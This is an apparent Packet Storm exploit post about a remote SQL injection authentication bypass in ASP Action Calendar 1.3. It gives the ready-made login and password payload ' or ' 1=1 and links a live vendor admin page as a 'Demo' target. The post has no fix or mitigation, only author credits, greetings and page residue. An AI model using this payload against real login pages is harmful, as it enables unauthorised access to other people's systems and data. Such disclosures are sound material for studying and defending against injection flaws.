ASP Action Calendar version 1.3 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
dc7ea528bfcbfc48d72b9b6a2f7459976aede6ddb4b205321b9619e2b45609c3* Founded By : SuB-ZeRo (WaLiD)
* E-mail : Fbh@hotmail.com
* Home : WwW.dz-security.Net
* GreeTZ : D-unit & X.CJP.x & www.dz-security.net & gaza
---------------------------------------------------------
vondor : www.warrenstudios.com
---------------------------------------------------------
Exploit Auth Bypass:
login: ' or ' 1=1
passw: ' or ' 1=1
----------------------------------------------------------
-[!]
Demo :
http://www.warrenstudios.com/actioncalendar/admin.asp
----------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed